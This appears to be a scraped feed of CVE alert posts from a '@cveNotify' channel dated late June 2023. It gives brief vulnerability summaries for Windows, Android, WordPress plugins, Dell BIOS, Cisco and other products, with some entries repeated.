🚨 CVE-2023-34849An unauthorized command injection vulnerability exists in the ActionLogin function of the webman.lua file in Ikuai router OS through 3.7.1.🎖@cveNotify |
|
| 2023-06-29 17:58:14 |
🚨 CVE-2023-36617A ReDoS issue was discovered in the URI component before 0.12.2 for Ruby. The URI parser mishandles invalid URLs that have specific characters. There is an increase in execution time for parsing strings to URI objects with rfc2396_parser.rb and rfc3986_parser.rb. NOTE: this issue exists becuse of an incomplete fix for CVE-2023-28755. Version 0.10.3 is also a fixed version.🎖@cveNotify |
|
| 2023-06-29 17:58:13 |
🚨 CVE-2022-23264Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2023-06-29 17:58:12 |
🚨 CVE-2023-34738Chemex through 3.7.1 is vulnerable to arbitrary file upload.🎖@cveNotify |
|
| 2023-06-29 14:58:14 |
🚨 CVE-2022-30256An issue was discovered in MaraDNS Deadwood through 3.5.0021 that allows variant V1 of unintended domain name resolution. A revoked domain name can still be resolvable for a long time, including expired domains and taken-down malicious domains. The effects of an exploit would be widespread and highly impactful, because the exploitation conforms to de facto DNS specifications and operational practices, and overcomes current mitigation patches for "Ghost" domain names.🎖@cveNotify |
|
| 2023-06-29 12:58:16 |
🚨 CVE-2023-22886Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow JDBC Provider.Airflow JDBC Provider Connection’s [Connection URL] parameters had norestrictions, which made it possible to implement RCE attacks viadifferent type JDBC drivers, obtain airflow server permission.This issue affects Apache Airflow JDBC Provider: before 4.0.0.🎖@cveNotify |
|
| 2023-06-29 10:58:41 |
🚨 CVE-2022-0756Missing Authorization in GitHub repository salesagility/suitecrm prior to 7.12.5.🎖@cveNotify |
|
| 2023-06-29 10:58:40 |
🚨 CVE-2022-0726Missing Authorization in GitHub repository chocobozzz/peertube prior to 4.1.0.🎖@cveNotify |
|
| 2023-06-29 10:58:39 |
🚨 CVE-2022-0596Improper Validation of Specified Quantity in Input in Packagist microweber/microweber prior to 1.2.11.🎖@cveNotify |
|
| 2023-06-29 10:58:38 |
🚨 CVE-2022-25164Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GX Works3 versions from 1.000A to 1.095Z and Mitsubishi Electric MX OPC UA Module Configurator-R versions 1.08J and prior allows a remote unauthenticated attacker to disclose sensitive information. As a result, unauthenticated attackers can gain unauthorized access to the MELSEC CPU module and the MELSEC OPC UA server module.🎖@cveNotify |
|
| 2023-06-29 10:58:37 |
🚨 CVE-2022-29830Use of Hard-coded Cryptographic Key vulnerability in Mitsubishi Electric GX Works3 versions from 1.000A to 1.095Z and Motion Control Setting(GX Works3 related software) versions from 1.000A and later allows a remote unauthenticated attacker to disclose or tamper with sensitive information. As a result, unauthenticated attackers may obtain information about project files illegally.🎖@cveNotify |
|
| 2023-06-29 10:58:36 |
🚨 CVE-2022-29827Use of Hard-coded Cryptographic Key vulnerability in Mitsubishi Electric GX Works3 versions from 1.000A and later allows a remote unauthenticated attacker to disclose sensitive information. As a result, unauthenticated attackers may view programs and project files or execute programs illegally.🎖@cveNotify |
|
| 2023-06-29 10:58:34 |
🚨 CVE-2022-29828Use of Hard-coded Cryptographic Key vulnerability in Mitsubishi Electric GX Works3 versions from 1.000A and later allows a remote unauthenticated attacker to disclose sensitive information. As a result, unauthenticated attackers may view programs and project file or execute programs illegally.🎖@cveNotify |
|
| 2023-06-29 10:58:33 |
🚨 CVE-2022-0414Improper Validation of Specified Quantity in Input in Packagist dolibarr/dolibarr prior to 16.0.🎖@cveNotify |
|
| 2023-06-29 10:58:32 |
🚨 CVE-2022-0277Incorrect Permission Assignment for Critical Resource in Packagist microweber/microweber prior to 1.2.11.🎖@cveNotify |
|
| 2023-06-29 10:58:31 |
🚨 CVE-2022-0179snipe-it is vulnerable to Missing Authorization🎖@cveNotify |
|
| 2023-06-29 10:58:26 |
🚨 CVE-2022-23264Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2023-06-29 10:58:25 |
🚨 CVE-2023-3447The Active Directory Integration / LDAP Integration plugin for WordPress is vulnerable to LDAP Injection in versions up to, and including, 4.1.5. This is due to insufficient escaping on the supplied username value. This makes it possible for unauthenticated attackers to extract potentially sensitive information from the LDAP directory.🎖@cveNotify |
|
| 2023-06-29 10:58:24 |
🚨 CVE-2022-29831Use of Hard-coded Password vulnerability in Mitsubishi Electric Corporation GX Works3 versions from 1.015R to 1.095Z allows a remote unauthenticated attacker to obtain information about the project file for MELSEC safety CPU modules.🎖@cveNotify |
|
| 2023-06-29 10:58:23 |
🚨 CVE-2022-21926HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-29 10:58:22 |
🚨 CVE-2022-21971Windows Runtime Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-29 10:58:18 |
🚨 CVE-2022-21985Windows Remote Access Connection Manager Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-06-29 10:58:17 |
🚨 CVE-2022-21986.NET Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-29 10:58:16 |
🚨 CVE-2022-21989Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 10:58:15 |
🚨 CVE-2022-21844HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-29 10:58:14 |
🚨 CVE-2022-21996Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:37 |
🚨 CVE-2023-2982The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.🎖@cveNotify |
|
| 2023-06-29 06:58:35 |
🚨 CVE-2023-37237In Veritas NetBackup Appliance before 4.1.0.1 MR3, insecure permissions may allow an authenticated Admin to bypass shell restrictions and execute arbitrary operating system commands via SSH.🎖@cveNotify |
|
| 2023-06-29 06:58:34 |
🚨 CVE-2022-23298Windows NT OS Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:33 |
🚨 CVE-2022-23301HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:32 |
🚨 CVE-2022-24460Tablet Windows User Interface Application Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:31 |
🚨 CVE-2022-24465Microsoft Intune Portal for iOS Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:30 |
🚨 CVE-2022-24503Remote Desktop Protocol Client Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:29 |
🚨 CVE-2022-21973Windows Media Center Update Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:28 |
🚨 CVE-2022-21975Windows Hyper-V Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:24 |
🚨 CVE-2022-22006HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:23 |
🚨 CVE-2022-23278Microsoft Defender for Endpoint Spoofing Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:22 |
🚨 CVE-2022-22007HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:21 |
🚨 CVE-2022-23282Paint 3D Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:20 |
🚨 CVE-2022-23284Windows Print Spooler Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:16 |
🚨 CVE-2022-23266Microsoft Defender for IoT Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:15 |
🚨 CVE-2022-23286Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:14 |
🚨 CVE-2022-23288Windows DWM Core Library Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:13 |
🚨 CVE-2022-23291Windows DWM Core Library Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-29 06:58:12 |
🚨 CVE-2022-23295Raw Image Extension Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-29 00:58:18 |
🚨 CVE-2023-36475Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 5.5.2 and 6.2.1, an attacker can use a prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser. A patch is available in versions 5.5.2 and 6.2.1.🎖@cveNotify |
|
| 2023-06-29 00:58:17 |
🚨 CVE-2023-34736Guantang Equipment Management System version 4.12 is vulnerable to Arbitrary File Upload.🎖@cveNotify |
|
| 2023-06-29 00:58:13 |
🚨 CVE-2023-3357A NULL pointer dereference flaw was found in the Linux kernel AMD Sensor Fusion Hub driver. This flaw allows a local user to crash the system.🎖@cveNotify |
|
| 2023-06-29 00:58:12 |
🚨 CVE-2023-3389A use-after-free vulnerability in the Linux Kernel io_uring subsystem can be exploited to achieve local privilege escalation.Racing a io_uring cancel poll request with a linked timeout can cause a UAF in a hrtimer.We recommend upgrading past commit ef7dfac51d8ed961b742218f526bd589f3900a59 (4716c73b188566865bdd79c3a6709696a224ac04 for 5.10 stable and 0e388fce7aec40992eadee654193cad345d62663 for 5.15 stable).🎖@cveNotify |
|
| 2023-06-28 22:58:13 |
🚨 CVE-2022-29816In JetBrains IntelliJ IDEA before 2022.1 HTML injection into IDE messages was possible🎖@cveNotify |
|
| 2023-06-28 22:58:12 |
🚨 CVE-2022-30730Improper authorization in Samsung Pass prior to 1.0.00.33 allows physical attackers to acess account list without authentication.🎖@cveNotify |
|
| 2023-06-28 21:58:32 |
🚨 CVE-2023-21161In Parse of simdata.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-263783702References: N/A🎖@cveNotify |
|
| 2023-06-28 21:58:31 |
🚨 CVE-2023-21170In executeSetClientTarget of ComposerCommandEngine.h, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-252764410🎖@cveNotify |
|
| 2023-06-28 21:58:30 |
🚨 CVE-2023-21146there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239867994References: N/A🎖@cveNotify |
|
| 2023-06-28 21:58:29 |
🚨 CVE-2023-21176In list_key_entries of utils.rs, there is a possible way to disable user credentials due to resource exhaustion. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-222287335🎖@cveNotify |
|
| 2023-06-28 21:58:28 |
🚨 CVE-2023-21148In BuildSetConfig of protocolimsbuilder.cpp, there is a possible out of bounds read due to a missing null check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-263783657References: N/A🎖@cveNotify |
|
| 2023-06-28 21:58:27 |
🚨 CVE-2023-21178In installKey of KeyUtil.cpp, there is a possible failure of file encryption due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-140762419🎖@cveNotify |
|
| 2023-06-28 21:58:26 |
🚨 CVE-2021-31937Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-28 21:58:25 |
🚨 CVE-2023-21180In xmlParseTryOrFinish of parser.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-261365944🎖@cveNotify |
|
| 2023-06-28 21:58:24 |
🚨 CVE-2023-21182In Exynos_parsing_user_data_registered_itu_t_t35 of VendorVideoAPI.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-252764175🎖@cveNotify |
|
| 2023-06-28 21:58:23 |
🚨 CVE-2023-21147In lwis_i2c_device_disable of lwis_device_i2c.c, there is a possible UAF due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-269661912References: N/A🎖@cveNotify |
|
| 2023-06-28 21:58:22 |
🚨 CVE-2023-21191In fixNotification of NotificationManagerService.java, there is a possible bypass of notification hide preference due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-269738057🎖@cveNotify |
|
| 2023-06-28 21:58:21 |
🚨 CVE-2023-21186In LogResponse of Dns.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-261079188🎖@cveNotify |
|
| 2023-06-28 21:58:19 |
🚨 CVE-2023-21149In registerGsmaServiceIntentReceiver of ShannonRcsService.java, there is a possible way to activate/deactivate RCS service due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-270050709References: N/A🎖@cveNotify |
|
| 2023-06-28 21:58:18 |
🚨 CVE-2023-21188In btm_ble_update_inq_result of btm_ble_gap.cc, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-264624283🎖@cveNotify |
|
| 2023-06-28 21:58:17 |
🚨 CVE-2023-21197In btm_acl_process_sca_cmpl_pkt of btm_acl.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-251427561🎖@cveNotify |
|
| 2023-06-28 21:58:16 |
🚨 CVE-2023-21155In BuildSetRadioNode of protocolmiscbuilder.cpp, there is a possible out of bounds read due to a missing null check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-264540700References: N/A🎖@cveNotify |
|
| 2023-06-28 21:58:15 |
🚨 CVE-2023-21203In startWpsPbcInternal of sta_iface.cpp, there is a possible out of bounds read due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-262246082🎖@cveNotify |
|
| 2023-06-28 21:58:14 |
🚨 CVE-2023-21207In initiateTdlsSetupInternal of sta_iface.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-262236670🎖@cveNotify |
|
| 2023-06-28 21:58:12 |
🚨 CVE-2023-21208In setCountryCodeInternal of sta_iface.cpp, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-262245254🎖@cveNotify |
|
| 2023-06-28 16:58:15 |
🚨 CVE-2023-20006A vulnerability in the hardware-based SSL/TLS cryptography functionality of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series Appliances could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to an implementation error within the cryptographic functions for SSL/TLS traffic processing when they are offloaded to the hardware. An attacker could exploit this vulnerability by sending a crafted stream of SSL/TLS traffic to an affected device. A successful exploit could allow the attacker to cause an unexpected error in the hardware-based cryptography engine, which could cause the device to reload.🎖@cveNotify |
|
| 2023-06-28 16:58:13 |
🚨 CVE-2023-20028Multiple vulnerabilities in the web-based management interface of Cisco AsyncOS Software for Cisco Secure Email and Web Manager; Cisco Secure Email Gateway, formerly Cisco Email Security Appliance (ESA); and Cisco Secure Web Appliance, formerly Cisco Web Security Appliance (WSA), could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-06-28 16:58:12 |
🚨 CVE-2023-20105Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated attacker with Administrator-level read-only credentials to elevate their privileges to Administrator with read-write credentials on an affected system. Note: "Cisco Expressway Series" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-06-28 14:58:30 |
🚨 CVE-2022-48505This issue was addressed with improved data protection. This issue is fixed in macOS Ventura 13. An app may be able to modify protected parts of the file system🎖@cveNotify |
|
| 2023-06-28 14:58:29 |
🚨 CVE-2023-3330Improper Limitation of a Pathname to a Restricted Directory vulnerability in NEC Corporation Aterm WG2200HP all versions allows a attacker to obtain specific files in the product.🎖@cveNotify |
|
| 2023-06-28 14:58:28 |
🚨 CVE-2023-3331Improper Limitation of a Pathname to a Restricted Directory vulnerability in NEC Corporation Aterm WG2200HP all versions allows a attacker to delete specific files in the product.🎖@cveNotify |
|
| 2023-06-28 14:58:24 |
🚨 CVE-2023-3332Improper Neutralization of Input During Web Page Generation vulnerability in NEC Corporation Aterm WG2200HP all versions allows a attacker to execute an arbitrary script, after obtaining a high privilege exploiting CVE-2023-3330 and CVE-2023-3331 vulnerabilities.🎖@cveNotify |
|
| 2023-06-28 14:58:23 |
🚨 CVE-2023-3427The Salon Booking System plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.6. This is due to missing or incorrect nonce validation on the 'save_customer' function. This makes it possible for unauthenticated attackers to change the admin role to customer or change the user meta to arbitrary values via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-28 14:58:21 |
🚨 CVE-2023-1844The Subscribe2 plugin for WordPress is vulnerable to unauthorized access to email functionality due to a missing capability check when sending test emails in versions up to, and including, 10.40. This makes it possible for author-level attackers to send emails with arbitrary content and attachments to site users.🎖@cveNotify |
|
| 2023-06-28 14:58:20 |
🚨 CVE-2023-3407The Subscribe2 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 10.40. This is due to missing or incorrect nonce validation when sending test emails. This makes it possible for unauthenticated attackers to send test emails with custom content to users on sites running a vulnerable version of this plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-28 14:58:16 |
🚨 CVE-2023-36464pypdf is an open source, pure-python PDF library. In affected versions an attacker may craft a PDF which leads to an infinite loop if `__parse_content_stream` is executed. That is, for example, the case if the user extracted text from such a PDF. This issue was introduced in pull request #969 and resolved in pull request #1828. Users are advised to upgrade. Users unable to upgrade may modify the line `while peek not in (b"\r", b"\n")` in `pypdf/generic/_data_structures.py` to `while peek not in (b"\r", b"\n", b"")`.🎖@cveNotify |
|
| 2023-06-28 14:58:15 |
🚨 CVE-2023-25001A maliciously crafted SKP file in Autodesk Navisworks 2023 and 2022 be used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.🎖@cveNotify |
|
| 2023-06-28 14:58:14 |
🚨 CVE-2023-25002A maliciously crafted SKP file in Autodesk products is used to trigger use-after-free vulnerability. Exploitation of this vulnerability may lead to code execution.🎖@cveNotify |
|
| 2023-06-28 14:58:13 |
🚨 CVE-2020-18404An issue was discovered in espcms version P8.18101601. There is a cross site scripting (XSS) vulnerability that allows arbitrary code to be executed via the title parameter.🎖@cveNotify |
|
| 2023-06-28 14:58:12 |
🚨 CVE-2020-18409Cross Site Request Forgery (CSRF) vulnerability was discovered in CatfishCMS 4.8.63 that would allow attackers to obtain administrator permissions via /index.php/admin/index/modifymanage.html.🎖@cveNotify |
|
| 2023-06-28 12:58:14 |
🚨 CVE-2023-2785Mattermost fails to properly truncate the postgres error log message of a search query failure allowing an attacker to cause the creation of large log files which can result in Denial of Service🎖@cveNotify |
|
| 2023-06-28 05:58:59 |
🚨 CVE-2023-28029Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable🎖@cveNotify |
|
| 2023-06-28 05:58:58 |
🚨 CVE-2023-28030Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:57 |
🚨 CVE-2023-28032Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:56 |
🚨 CVE-2023-25937Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:54 |
🚨 CVE-2023-28028Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:53 |
🚨 CVE-2023-28033Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:52 |
🚨 CVE-2023-28039Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:51 |
🚨 CVE-2023-28040Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:50 |
🚨 CVE-2023-28042Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:49 |
🚨 CVE-2023-28035Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:48 |
🚨 CVE-2023-28041Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:47 |
🚨 CVE-2023-28054Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:45 |
🚨 CVE-2023-28052Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:44 |
🚨 CVE-2023-28056Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:43 |
🚨 CVE-2023-28059Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user with administrator privileges may potentially exploit this vulnerability in order to modify a UEFI variable.🎖@cveNotify |
|
| 2023-06-28 05:58:42 |
🚨 CVE-2023-1844The Subscribe2 plugin for WordPress is vulnerable to unauthorized access to email functionality due to a missing capability check when sending test emails in versions up to, and including, 10.40. This makes it possible for author-level attackers to send emails with arbitrary content and attachments to site users.🎖@cveNotify |
|
| 2023-06-28 05:58:41 |
🚨 CVE-2023-3407The Subscribe2 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 10.40. This is due to missing or incorrect nonce validation when sending test emails. This makes it possible for unauthenticated attackers to send test emails with custom content to users on sites running a vulnerable version of this plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-28 05:58:40 |
🚨 CVE-2022-48505This issue was addressed with improved data protection. This issue is fixed in macOS Ventura 13. An app may be able to modify protected parts of the file system🎖@cveNotify |
|
| 2023-06-28 05:58:39 |
🚨 CVE-2023-3330Improper Limitation of a Pathname to a Restricted Directory vulnerability in NEC Corporation Aterm WG2200HP all versions allows a attacker to obtain specific files in the product.🎖@cveNotify |
|
| 2023-06-28 05:58:37 |
🚨 CVE-2023-3331Improper Limitation of a Pathname to a Restricted Directory vulnerability in NEC Corporation Aterm WG2200HP all versions allows a attacker to delete specific files in the product.🎖@cveNotify |
|
| 2023-06-27 21:58:33 |
🚨 CVE-2022-3993Authentication Bypass by Primary Weakness in GitHub repository kareadita/kavita prior to 0.6.0.3.🎖@cveNotify |
|
| 2023-06-27 21:58:32 |
🚨 CVE-2023-23468IBM Robotic Process Automation for Cloud Pak 21.0.1 through 21.0.7.3 and 23.0.0 through 23.0.3 is vulnerable to insufficient security configuration which may allow creation of namespaces within a cluster. IBM X-Force ID: 244500.🎖@cveNotify |
|
| 2023-06-27 21:58:31 |
🚨 CVE-2023-29068A maliciously crafted file consumed through pskernel.dll file could lead to memory corruption vulnerabilities. These vulnerabilities in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2023-06-27 21:58:27 |
🚨 CVE-2020-18418A Cross site request forgery (CSRF) vulnerability was discovered in FeiFeiCMS v4.1.190209, which allows attackers to create administrator accounts via /index.php?s=Admin-Admin-Insert.🎖@cveNotify |
|
| 2023-06-27 21:58:26 |
🚨 CVE-2016-1469The HTTP framework on Cisco SPA300, SPA500, and SPA51x devices allows remote attackers to cause a denial of service (device outage) via a series of malformed HTTP requests, aka Bug ID CSCut67385.🎖@cveNotify |
|
| 2023-06-27 21:58:25 |
🚨 CVE-2022-21676Engine.IO is the implementation of transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process. This impacts all the users of the `engine.io` package starting from version `4.0.0`, including those who uses depending packages like `socket.io`. Versions prior to `4.0.0` are not impacted. A fix has been released for each major branch, namely `4.1.2` for the `4.x.x` branch, `5.2.1` for the `5.x.x` branch, and `6.1.1` for the `6.x.x` branch. There is no known workaround except upgrading to a safe version.🎖@cveNotify |
|
| 2023-06-27 21:58:21 |
🚨 CVE-2022-23118Jenkins Debian Package Builder Plugin 1.6.11 and earlier implements functionality that allows agents to invoke command-line `git` at an attacker-specified path on the controller, allowing attackers able to control agent processes to invoke arbitrary OS commands on the controller.🎖@cveNotify |
|
| 2023-06-27 21:58:20 |
🚨 CVE-2022-22265An improper check or handling of exceptional conditions in NPU driver prior to SMR Jan-2022 Release 1 allows arbitrary memory write and code execution.🎖@cveNotify |
|
| 2023-06-27 21:58:19 |
🚨 CVE-2022-23433Improper access control vulnerability in Reminder prior to versions 12.3.01.3000 in Android S(12), 12.2.05.6000 in Android R(11) and 11.6.08.6000 in Andoid Q(10) allows attackers to register reminders or execute exporeted activities remotely.🎖@cveNotify |
|
| 2023-06-27 21:58:15 |
🚨 CVE-2022-21825An Improper Access Control vulnerability exists in Citrix Workspace App for Linux 2012 - 2111 with App Protection installed that can allow an attacker to perform local privilege escalation.🎖@cveNotify |
|
| 2023-06-27 21:58:14 |
🚨 CVE-2022-23008On NGINX Controller API Management versions 3.18.0-3.19.0, an authenticated attacker with access to the "user" or "admin" role can use undisclosed API endpoints on NGINX Controller API Management to inject JavaScript code that is executed on managed NGINX data plane instances. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-06-27 21:58:13 |
🚨 CVE-2022-22734The Simple Quotation WordPress plugin through 1.3.2 does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them🎖@cveNotify |
|
| 2023-06-27 18:58:34 |
🚨 CVE-2020-21246Cross Site Scripting vulnerability in YiiCMS v.1.0 allows a remote attacker to execute arbitrary code via the news function.🎖@cveNotify |
|
| 2023-06-27 18:58:33 |
🚨 CVE-2022-39392Wasmtime is a standalone runtime for WebAssembly. Prior to version 2.0.2, there is a bug in Wasmtime's implementation of its pooling instance allocator when the allocator is configured to give WebAssembly instances a maximum of zero pages of memory. In this configuration, the virtual memory mapping for WebAssembly memories did not meet the compiler-required configuration requirements for safely executing WebAssembly modules. Wasmtime's default settings require virtual memory page faults to indicate that wasm reads/writes are out-of-bounds, but the pooling allocator's configuration would not create an appropriate virtual memory mapping for this meaning out of bounds reads/writes can successfully read/write memory unrelated to the wasm sandbox within range of the base address of the memory mapping created by the pooling allocator. This bug is not applicable with the default settings of the `wasmtime` crate. This bug can only be triggered by setting `InstanceLimits::memory_pages` to zero. This is expected to be a very rare configuration since this means that wasm modules cannot allocate any pages of linear memory. All wasm modules produced by all current toolchains are highly likely to use linear memory, so it's expected to be unlikely that this configuration is set to zero by any production embedding of Wasmtime. This bug has been patched and users should upgrade to Wasmtime 2.0.2. This bug can be worked around by increasing the `memory_pages` allotment when configuring the pooling allocator to a value greater than zero. If an embedding wishes to still prevent memory from actually being used then the `Store::limiter` method can be used to dynamically disallow growth of memory beyond 0 bytes large. Note that the default `memory_pages` value is greater than zero.🎖@cveNotify |
|
| 2023-06-27 18:58:32 |
🚨 CVE-2022-39370GLPI stands for Gestionnaire Libre de Parc Informatique. GLPI is a Free Asset and IT Management Software package that provides ITIL Service Desk features, licenses tracking and software auditing. Connected users may gain access to debug panel through the GLPI update script. This issue has been patched, please upgrade to 10.0.4. As a workaround, delete the `install/update.php` script.🎖@cveNotify |
|
